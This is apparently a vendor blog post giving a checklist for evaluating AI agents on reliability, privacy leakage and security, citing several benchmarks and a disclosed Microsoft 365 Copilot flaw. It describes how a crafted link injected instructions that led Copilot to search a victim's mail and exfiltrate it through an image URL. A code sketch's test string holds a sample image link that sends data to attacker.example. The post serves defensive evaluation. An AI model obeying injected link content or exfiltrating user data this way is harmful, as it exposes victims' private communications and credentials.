Can You Trust an AI Agent? Evaluating Reliability, Data Leakage, and Security

"Can I trust this agent?" used to be a gut call. As of mid-June 2026 it's an engineering question with answers you can measure — and the same week made the case in three pieces at once. Two new benchmarks landed that quantify how agentic a model really is and whether an agent can keep a secret, and a critical, one-click Microsoft Copilot exploit showed what happens when an agent with real permissions trusts the wrong input. If you're putting agents into production, this is the moment to replace vibes with a checklist. This post lays out a practical evaluation playbook across three dimensions — reliability, data-leakage, and security — grounded in those sources.
Why "can I trust this agent?" is now an engineering question
An agent is not a chatbot. It plans, calls tools, reads and writes data, and acts across many steps — often with the same permissions as the human it works for. That means three distinct failure modes, and each needs its own test:
- Reliability — does it actually complete the task, consistently, without silent failures?
- Leakage — does it keep private information private, even while using external tools?
- Security — can an attacker hijack it through the inputs it consumes?
A model can ace one and fail the others. The rest of this guide is how to measure each.
How do you measure agent reliability?
Reliability is more than "did it get the right answer." A recent Hugging Face evaluation of open models for agentic use makes the point sharply: match rate alone is blind to how much work a success took. Two agents can both reach the correct answer while differing wildly in time, token cost, error rate, and silent failures — and those differences are the whole ballgame in production.
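To make the point concrete, here is a minimal sketch of an effort-aware summary over per-run records. The `Run` fields, the `summarize` function, and the sample numbers are all hypothetical illustrations, not the Hugging Face harness's actual schema or results. It assumes each run has already been labeled for errors and silent failures.

```python
from dataclasses import dataclass
from statistics import median


@dataclass
class Run:
    matched: bool         # final answer matched the reference
    seconds: float        # wall-clock time for the run
    tokens: int           # total tokens consumed
    errored: bool         # run hit at least one visible error
    silent_failure: bool  # run reported success but did not do the work


def summarize(runs):
    """Aggregate match rate together with the effort and failure metrics."""
    n = len(runs)
    if n == 0:
        raise ValueError("no runs to summarize")
    return {
        "match_rate": sum(r.matched for r in runs) / n,
        "median_seconds": median(r.seconds for r in runs),
        "median_tokens": median(r.tokens for r in runs),
        # Error rate counts silent failures as errors too.
        "error_rate": sum(r.errored or r.silent_failure for r in runs) / n,
        "silent_failure_rate": sum(r.silent_failure for r in runs) / n,
    }


# Illustrative data only: both agents match every time, at very different cost.
agent_a = [Run(True, 10.0, 1000, False, False), Run(True, 12.0, 1200, False, False)]
agent_b = [Run(True, 60.0, 9000, False, False), Run(True, 80.0, 11000, True, False)]

for name, runs in (("agent_a", agent_a), ("agent_b", agent_b)):
    print(name, summarize(runs))
```

Both sample agents score the same on match rate, so only the time, token, and error columns separate them. That is the gap a match-rate-only report hides.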
Are agentic benchmarks measuring the right things?
That Hugging Face harness ("Is it agentic enough?") evaluates models across several axes at once: whether the final answer is correct, the median time and tokens spent, the percentage of runs that hit errors (including silent failures), and whether the agent adopts the tool-defined behaviors it's supposed to. It runs each model across variations — bare environment, full source available, and a packaged "skill" with CLI docs and examples — to see how capability changes with context.
The most useful finding for evaluators is a warning: a change that helps strong models can hurt weaker ones. Giving large models (Kimi-K2.6, GLM-5.1, MiniMax-M2.7) a CLI affordance reduced their completion time, but smaller models degraded — in one case a 14B model's match rate on a sentiment task collapsed from 100% to 0% because it misread CLI documentation as a callable tool and stopped falling back to a working code path. The lesson: evaluate agentic capability across model sizes and across the exact scaffolding you'll deploy, because "agentic enough" is a property of the model and its environment, not the model alone.
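One way to catch this kind of regression is to compare every model against its own baseline for each scaffolding variant. The sketch below assumes you already have match rates keyed by model and scaffold. The function name, the scaffold labels, the tolerance, and the large-model numbers are hypothetical; only the 100% to 0% collapse for a 14B model comes from the evaluation described above.

```python
def scaffold_regressions(match_rates, baseline="bare", tolerance=0.05):
    """Return (model, scaffold, baseline_rate, rate) for every scaffold that
    drops a model's match rate below its own baseline by more than tolerance."""
    regressions = []
    for model, by_scaffold in match_rates.items():
        base = by_scaffold[baseline]
        for scaffold, rate in by_scaffold.items():
            if scaffold != baseline and base - rate > tolerance:
                regressions.append((model, scaffold, base, rate))
    return regressions


# Illustrative values: the large-model row is made up for the example.
rates = {
    "large-model": {"bare": 0.95, "cli": 0.96},
    "small-14b": {"bare": 1.0, "cli": 0.0},
}

for model, scaffold, base, rate in scaffold_regressions(rates):
    print(f"{model}: {scaffold} dropped match rate from {base:.0%} to {rate:.0%}")
```

Comparing each model to its own baseline, rather than averaging across models, keeps a gain on strong models from masking a collapse on a weaker one.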
How do you measure long-horizon consistency?
Single-task success says nothing about whether an agent holds together over a long, dependent sequence. CEO-Bench measures exactly that: agents run a simulated startup for 500 days through a programmable interface, setting pricing, managing budgets, and coordinating decisions across interconnected data over time. It targets four capabilities: navigating long horizons under uncertainty, gathering information in noisy environments, adapting to a changing world, and orchestrating many moving parts toward one goal. The result is humbling: most state-of-the-art models struggle. In the paper's reporting, only the strongest closed frontier models preserved their starting balance, and none was consistently profitable. If you're deploying long-horizon agents, that's the reliability bar, and it's higher than most one-shot benchmarks imply.
Can your AI agent keep a secret?
Reliability is necessary but not sufficient. An agent that completes the task while quietly leaking your private data is a different kind of failure — and it's now benchmarkable.
What MosaicLeaks tests and why it matters
MosaicLeaks, published by researchers at ServiceNow on June 18, 2026, measures privacy leakage in deep-research agents — specifically how an agent that combines private local documents with external web search can leak sensitive information through its query logs. The "mosaic effect" is the core insight: individually harmless web queries, combined across a log, can reconstruct private enterprise facts. The benchmark scores three leakage types — intent (an adversary infers your research goals from the logs), answer (an adversary answers a specific private question from the logs), and full-information (an adversary surfaces verifiably true private facts without even being told what to look for) — across roughly a thousand multi-hop research chains.
The findings should change how you think about agent privacy:
- Optimizing for task performance made leakage worse. Training an agent to be better at the task pushed answer/full-info leakage up from 34.0% to 51.7%, because richer queries that improve retrieval also leak more context. Capability and privacy are not automatically aligned.
- Prompting doesn't fix it. Adding privacy instructions to the prompt had inconsistent, minimal effects. You cannot tell an agent "don't leak" and call it solved.
- Privacy can be trained in without sacrificing performance. The authors' privacy-aware training approach cut leakage from 34.0% to 9.9% while keeping nearly all of the task-performance gains — the agents issued more web queries but stripped the revealing details out of them.
The takeaway for evaluators: if your agent touches private documents and external tools in the same loop, test it for leakage explicitly. Don't assume a privacy instruction in the system prompt is doing anything.
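As a starting point for such a test, the sketch below is a crude keyword-overlap check on an agent's outbound query log. It is not the MosaicLeaks scoring method, which evaluates what an adversary can infer from the logs. The function names, the fact definitions, and the sample queries are hypothetical. The sketch only illustrates the mosaic idea: a private fact can be covered by the log as a whole even when no single query covers it.

```python
import re


def terms(text):
    """Lowercase alphanumeric tokens in a query."""
    return set(re.findall(r"[a-z0-9]+", text.lower()))


def mosaic_exposure(private_facts, query_log):
    """Classify each private fact as exposed by a single query, exposed only
    by the combined log ("mosaic"), or not exposed ("none")."""
    per_query = [terms(q) for q in query_log]
    combined = set().union(*per_query)
    report = {}
    for name, keywords in private_facts.items():
        needed = {k.lower() for k in keywords}
        if any(needed <= q for q in per_query):
            report[name] = "single-query"
        elif needed <= combined:
            report[name] = "mosaic"
        else:
            report[name] = "none"
    return report


# Hypothetical private facts, each reduced to the keywords that identify it.
facts = {
    "acquisition": ["acme", "acquisition", "q3"],
    "layoffs": ["layoffs", "berlin"],
}
# Hypothetical web queries issued by the agent during one research task.
log = [
    "acme corp market share",
    "typical acquisition due diligence timeline",
    "q3 earnings calendar 2026",
]

print(mosaic_exposure(facts, log))
```

A keyword check like this will miss paraphrased leaks and will flag harmless overlaps, so treat it as a smoke test to run alongside a proper adversarial evaluation, not a replacement for one.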
The security dimension: when an agent becomes an attack surface
Leakage covers what an agent reveals by accident. Security covers what an attacker can make it do on purpose — and the bar for "real-world stakes" was cleared decisively this month.
What does the Copilot exploit teach us?
Researchers at Varonis Threat Labs disclosed a critical, one-click vulnerability in Microsoft 365 Copilot — dubbed "SearchLeak" and assigned CVE-2026-42824 — that Microsoft rated maximum severity and has since mitigated on its backend. The mechanics are exactly the nightmare scenario for agentic AI: an attacker crafts a malicious URL using a "parameter-to-prompt" injection (a close cousin of prompt injection). The victim simply clicks the link — they type nothing — and Copilot, which operates with the user's full data permissions, can be instructed to search the victim's emails, extract content, and exfiltrate it by embedding it in an image URL. Because the agent inherits the victim's access, an attacker can reach confidential communications and, per the reporting, even two-factor authentication codes — without ever authenticating themselves. Varonis demonstrated a proof-of-concept; there's no evidence of exploitation in the wild, and the flaw was fixed.
The lesson generalizes well beyond Copilot: any agent that (a) ingests untrusted input and (b) acts with real permissions is an attack surface. Prompt injection is not a theoretical curiosity; it's a max-severity vulnerability class. If your agent reads web pages, emails, documents, or links — and acts on them with privileges — you must threat-model injection as a first-class risk, not an edge case.
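One generic defense against the image-URL exfiltration channel described above is to check agent output for image references that point outside an allowlist before anything renders them. The sketch below is an assumption-laden illustration, not Microsoft's mitigation: the allowlist, the host names, and the function name are hypothetical, and the regular expressions cover only basic Markdown and HTML image syntax.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the UI may load images from.
ALLOWED_IMAGE_HOSTS = {"assets.example.com"}

MD_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)")
HTML_IMAGE = re.compile(r"<img[^>]+src=[\"']([^\"']+)[\"']", re.IGNORECASE)


def suspicious_image_urls(agent_output):
    """Return image URLs in the output whose host is not allowlisted.
    Relative URLs have no host, so they are flagged as well."""
    urls = MD_IMAGE.findall(agent_output) + HTML_IMAGE.findall(agent_output)
    flagged = []
    for url in urls:
        host = urlparse(url).hostname or ""
        if host not in ALLOWED_IMAGE_HOSTS:
            flagged.append(url)
    return flagged


# Illustrative output: one image smuggles data in its query string.
output = (
    "Here is your summary. "
    "![status](https://attacker.example/p.png?d=MjEzNDU2) "
    "![logo](https://assets.example.com/logo.png)"
)

print(suspicious_image_urls(output))
```

An output filter like this narrows one exfiltration path. It does not stop the injection itself, so it belongs alongside input handling and permission scoping rather than in place of them.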
A practical agent-evaluation checklist
Pulling the three dimensions together, here's a starting checklist before you trust an agent in production:
Reliability
- Measure beyond match rate: track time, token cost, error rate, and silent failures per task.
- Test across the exact scaffolding you'll deploy — an affordance that helps one model can break another.
- Include long-horizon, multi-step tasks, not just one-shot prompts. Sequential decision-making is where agents quietly fall apart.
Data leakage
- If the agent mixes private data with external tools, test for leakage through its tool calls and query logs, not just its final answer.
- Don't rely on a "be private" system prompt — verify behavior; prompting alone is unreliable.
- Watch for the capability/privacy tradeoff: a more capable agent can leak more.
Security
- Threat-model prompt and parameter injection for any agent that consumes untrusted input.
- Apply least privilege: scope the agent's permissions to the minimum, since an attacker who hijacks it inherits exactly those permissions.
- Test the full chain — a single crafted link should not be able to turn your agent into a data-exfiltration tool.
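The least-privilege item can be sketched as a wrapper that exposes only an explicitly allowed subset of tools to the agent. The `ScopedToolbox` class and the tool names are hypothetical. A real deployment would also enforce scope at the credential or API level instead of relying on an in-process check alone.

```python
class ScopedToolbox:
    """Expose only an explicitly allowed subset of tools to an agent."""

    def __init__(self, tools, allowed):
        # Tools outside the allowed set are dropped, not merely hidden.
        self._tools = {name: fn for name, fn in tools.items() if name in allowed}

    def call(self, name, *args, **kwargs):
        if name not in self._tools:
            raise PermissionError(f"tool {name!r} is outside this agent's scope")
        return self._tools[name](*args, **kwargs)


# Hypothetical tools standing in for real integrations.
def search_docs(query):
    return f"results for {query}"


def send_email(to, body):
    return f"sent to {to}"


all_tools = {"search_docs": search_docs, "send_email": send_email}

# A research agent that only needs to read documents gets nothing else.
box = ScopedToolbox(all_tools, allowed={"search_docs"})
print(box.call("search_docs", "pricing"))

try:
    box.call("send_email", "someone@example.com", "hello")
except PermissionError as exc:
    print("blocked:", exc)
```

If an injected instruction asks this agent to send mail, the call fails at the toolbox instead of depending on the model to refuse.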
FAQ
How do you test if an AI agent leaks data?
Evaluate the agent's actions, not just its outputs. Benchmarks like MosaicLeaks score leakage through an agent's tool calls and query logs across multi-hop tasks, including the "mosaic" case where individually benign queries combine to reveal private facts. Critically, test behavior rather than trusting a privacy instruction in the prompt — research shows prompting alone has minimal, inconsistent effect, and that optimizing purely for task performance can increase leakage.
What's the difference between reliability and security testing for agents?
Reliability testing asks whether the agent does its job well — correctly, consistently, and at acceptable cost, including over long task horizons. Security testing asks whether an adversary can make the agent do something it shouldn't, typically via prompt or parameter injection through the inputs it consumes. A reliable agent can still be insecure: the Copilot SearchLeak flaw was a perfectly functional assistant that an attacker could weaponize with a single link.
Which agent benchmarks should I actually run?
Match them to your risk. For agentic capability and cost-aware reliability, use a harness that measures effort (time, tokens, error and silent-failure rates) across model sizes and your real scaffolding. For long-horizon consistency, a sustained, multi-step benchmark like CEO-Bench exposes failures one-shot tests miss. For privacy, MosaicLeaks-style leakage evaluation matters whenever private data and external tools share a loop. For security, run prompt- and parameter-injection red-teaming against any agent with real permissions.
Takeaways for Clawvard readers
- Agent trust decomposes into three measurable dimensions (reliability, data leakage, and security), and a model can pass one while failing the others.
- This month's research makes the tests concrete: effort-aware agentic benchmarks for reliability, MosaicLeaks for leakage, CEO-Bench for long-horizon consistency, and the critical Copilot SearchLeak exploit as proof that injection is a max-severity risk, not a hypothetical.
- Don't trust a system prompt to enforce privacy or safety — verify behavior. The model you evaluate matters too; if you're weighing an open-weights option, see our companion piece on GLM-5.2 and long-horizon agents.
Building agents you actually have to trust in production? Run them through a real evaluation loop with Clawvard — measure reliability, leakage, and injection resistance before you ship, not after.